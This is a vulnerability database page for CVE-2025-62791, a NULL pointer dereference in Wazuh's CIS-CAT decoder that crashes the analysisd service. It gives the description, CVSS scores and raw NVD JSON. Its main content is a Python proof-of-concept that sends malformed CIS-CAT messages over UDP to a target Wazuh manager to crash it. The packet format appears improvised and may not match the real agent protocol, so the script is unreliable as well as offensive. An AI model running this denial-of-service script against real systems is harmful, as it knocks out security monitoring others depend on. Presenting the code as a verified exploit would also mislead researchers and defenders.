CVE-2025-62791

Description

Wazuh is a free and open source platform used for threat prevention, detection, and response. Prior to 4.11.0, DecodeCiscat() implementation does not check the return the value of cJSON_GetObjectItem() for a possible NULL value in case of an error. A compromised agent can cause a crash of analysisd by sending a specially crafted message to the wazuh manager. An attacker who is able to craft and send an agent message to the wazuh manager can cause analysisd to crash and make it unavailable. This vulnerability is fixed in 4.11.0.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:* - VULNERABLE

Wazuh < 4.11.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-62791 PoC - Wazuh DecodeCiscat NULL Pointer Dereference
This PoC demonstrates sending a malformed CIS-CAT message that triggers
a NULL pointer dereference in DecodeCiscat() function.
Note: This is for educational and authorized testing purposes only.
"""

import socket
import json
import struct

def send_wazuh_message(target_ip, target_port, message):
    """Send a message to Wazuh manager via agent-manager protocol"""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        # Prepend message length as uint32
        msg_bytes = message.encode('utf-8')
        packet = struct.pack('>I', len(msg_bytes)) + msg_bytes
        sock.sendto(packet, (target_ip, target_port))
        sock.close()
        print(f"[+] Malformed message sent to {target_ip}:{target_port}")
        return True
    except Exception as e:
        print(f"[-] Error sending message: {e}")
        return False

def generate_malformed_ciscat_message():
    """
    Generate a malformed CIS-CAT message that triggers NULL pointer
    dereference in DecodeCiscat() by omitting required JSON fields
    """
    # Malformed message that causes cJSON_GetObjectItem to return NULL
    # for required fields, leading to NULL pointer dereference
    ciscat_data = {
        # Intentionally omit or invalidate required fields to trigger NULL return
        "type": "ciscat",
        "agent_id": "001",
        "timestamp": "2025-10-29T12:00:00Z",
        # Missing or malformed 'ciscat' field that should contain scan results
        "ciscat": {
            # Intentionally empty or malformed data
            "scan_id": None,
            "scan_time": None
        }
    }
    
    # Create the full Wazuh message structure
    full_message = {
        "origin": "/var/ossec/etc/shared/agent.conf",
        "module": "ciscat",
        "data": ciscat_data
    }
    
    return json.dumps(full_message)

def generate_ciscat_crash_message():
    """
    Alternative: Generate message that triggers parsing error
    causing cJSON_GetObjectItem to return NULL
    """
    message = "1:/var/ossec/etc/shared/agent.conf:ciscat|{"
    message += "\"type\":\"ciscat\",\"agent_id\":\"001\",\"ciscat\":{\"error\":true}}"
    return message

if __name__ == "__main__":
    import argparse
    
    parser = argparse.ArgumentParser(description='CVE-2025-62791 PoC')
    parser.add_argument('--target', default='127.0.0.1', help='Wazuh Manager IP')
    parser.add_argument('--port', type=int, default=1514, help='Wazuh Manager Port')
    args = parser.parse_args()
    
    print("[*] CVE-2025-62791 - Wazuh DecodeCiscat NULL Pointer Dereference")
    print("[*] Target:", args.target)
    print("[*] Generating malformed CIS-CAT message...")
    
    # Method 1: Malformed JSON
    message1 = generate_malformed_ciscat_message()
    send_wazuh_message(args.target, args.port, message1)
    
    # Method 2: Direct crash message
    message2 = generate_ciscat_crash_message()
    send_wazuh_message(args.target, args.port, message2)
    
    print("[*] Exploit sent. If vulnerable, analysisd will crash.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62791
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62791
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62791/
[4] VulDB https://vuldb.com/cve/CVE-2025-62791
[5] https://github.com/wazuh/wazuh/security/advisories/GHSA-gcwf-6p6m-gvm7

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62791", "sourceIdentifier": "[email protected]", "published": "2025-10-29T17:15:37.133", "lastModified": "2025-11-03T19:34:46.937", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wazuh is a free and open source platform used for threat prevention, detection, and response. Prior to 4.11.0, DecodeCiscat() implementation does not check the return the value of cJSON_GetObjectItem() for a possible NULL value in case of an error. A compromised agent can cause a crash of analysisd by sending a specially crafted message to the wazuh manager. An attacker who is able to craft and send an agent message to the wazuh manager can cause analysisd to crash and make it unavailable. This vulnerability is fixed in 4.11.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-252"}, {"lang": "en", "value": "CWE-476"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.11.0", "matchCriteriaId": "7EBF4F2E-C12A-401D-8408-287D9EC5B0B1"}]}]}], "references": [{"url": "https://github.com/wazuh/wazuh/security/advisories/GHSA-gcwf-6p6m-gvm7", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}